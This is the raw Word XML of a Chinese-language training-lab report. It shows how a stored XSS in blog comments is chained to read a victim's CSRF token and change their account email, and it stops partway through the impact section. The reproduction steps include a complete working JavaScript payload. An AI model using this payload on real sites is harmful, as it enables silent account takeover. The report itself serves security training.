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71825" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS 漏洞报告（Lab3：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>利用 XSS 绕过 CSRF 防御</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6525FB09" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. 漏洞名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C7FED" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>跨站脚本攻击（XSS）— 组合利用绕过 CSRF 防御实现未授权操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4964AA5F" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. 漏洞等级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8E158" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>高危（High）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4219B6D9" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88806A" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">该网站博客评论功能存在存储型 XSS 漏洞，同时用户个人中心的“修改邮箱”功能存在 CSRF 漏洞（仅依赖隐藏的 CSRF Token 进行防御，而未校验 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve"> 或 Origin）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:br/>
        <w:t>攻击者可通过存储型 XSS 注入一段恶意 JavaScript 代码，当管理员或其他用户浏览该评论时，代码会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>自动、静默地</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>以受害者的身份请求 /my-account 页面，提取出页面的 CSRF Token，并利用该 Token 伪造请求，将受害者的邮箱修改为攻击者控制的邮箱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B35DB0" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. 漏洞位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161E1A75" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS 注入点</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：博客评论功能（Comment / 评论框）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>恶意利用路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：GET /my-account（获取 Token）→ POST /my-account/change-email（提交更改）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE9B51A" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. 漏洞复现过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD55B91" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>第一步：正常登录，准备攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6726C18F" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>使用平台提供的测试账号 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>wiener:peter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t> 进行登录，进入个人主页。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB41AC" w14:textId="050D84A5" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>图1：正常登录实验账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6226819C" wp14:editId="4779777F">
            <wp:extent cx="5276850" cy="3819525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="179381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23C7">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>说明：登录普通账号，准备进行后续的 CSRF Token 提取及 XSS 注入工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A032E7D" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>第二步：源码审计，发现 CSRF 防御机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B446E" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>进入“我的账户”页面，开启浏览器开发者工具（F12），查看页面的源代码（Elements）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12893E14" w14:textId="265CF371" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>图2：查看个人中心页面，发现隐藏的 CSRF 令牌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB78670" wp14:editId="67AEA0D9">
            <wp:extent cx="5267325" cy="3667125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="11780819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23C7">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>说明：通过查看前端源码，发现修改邮箱的表单包含一个隐藏的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t> 参数。后端通过验证这个动态 Token 来防御跨站请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F3166" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>第三步：构造恶意 XSS 注入脚本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6EF5E" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>为了绕过 CSRF 防御，攻击者编写的 XSS Payload 必须包含两步逻辑：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>第一步，自动向当前用户页面发送请求，抓取 Token；第二步，带着抓到的 Token 发送修改邮箱的 POST 请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:br/>
        <w:t>构造的攻击脚本如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3609D6C5" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32811371" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD3A1A8" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">var req = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED6812" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>req.onload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>handleResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE63AB" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>req.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>('get','/my-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>account</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>',true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E024499" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>req.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EAB9A" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>handleResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D9FCE7" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">    var token = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>this.responseText.match</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>(/name="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>" value="(\w+)"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>/)[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7E81C" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">    var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>changeReq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve"> = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E204ADF" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>changeReq.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>('post', '/my-account/change-email', true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E5188B" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>changeReq.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>csrf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>='+token+'&amp;email=test@test.com')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEB4392" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8BFEEC" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4A0D33" w14:textId="05E65B7C" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>图3：在博客评论框中提交恶意 XSS Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B920C50" wp14:editId="50B4E9C8">
            <wp:extent cx="5257800" cy="3019425"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13160409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23C7">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>说明：攻击者利用网站评论功能未过滤 XSS 标签的漏洞，将自动化攻击脚本存入服务器数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E919B2" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>第四步：触发攻击并完成实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B9608" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>提交评论后，由于该 Payload 是存储型的，当任何人（包括实验环境自动模拟的受害者）加载该博客页面时，这段 JavaScript 代码会自动在受害者的浏览器中执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186AB025" w14:textId="2288279A" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>图4：XSS 攻击触发成功，实验室已解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BD49051" wp14:editId="6B1CF376">
            <wp:extent cx="5267325" cy="2962275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="4898339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23C7">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>说明：脚本执行后，页面在用户毫无感知的情况下，自动提取了受害者的 CSRF Token，并向服务端发送了修改邮箱的请求。靶场确认攻击成功，完成实验。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF42E51" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. 漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A1C013" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:r w:rsidRPr="00A923C7">
        <w:t>这是一个 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞组合放大攻击（Chained Attack）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t> 的典型案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09529344" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>根本起因</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：网站存在存储型 XSS，允许用户执行任意 JavaScript 代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE83C91" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>逻辑利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">：网站仅依赖前端隐藏 Token 防 CSRF，且没有在服务端设置同源策略（如校验 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>Referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve"> 头）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B686E9A" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>执行过程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067E151" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:t>受害者浏览器加载恶意评论 → 触发 XSS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B8BF6" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:t xml:space="preserve">XSS 脚本利用 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A923C7">
        <w:t>，以受害者身份悄悄请求 /my-account。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375244E" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:t>脚本在返回的 HTML 中提取到受害者专属的 CSRF Token。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFE6E39" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:t>脚本携带这个合法的 Token，以受害者身份发送 POST 请求，将受害者邮箱修改为攻击者的邮箱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED748CA" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. 漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44103D2E" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>组合拳杀伤力极大</w:t>
      </w:r>
      <w:r w:rsidRPr="00A923C7">
        <w:t>：即使网站安装了 CSRF 防御机制，只要存在 XSS，攻击者就能自动“提取”并“绕过”该防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E07F8B5" w14:textId="77777777" w:rsidR="00A923C7" w:rsidRPr="00A923C7" w:rsidRDefault="00A923C7" w:rsidP="00A923C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A923C7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
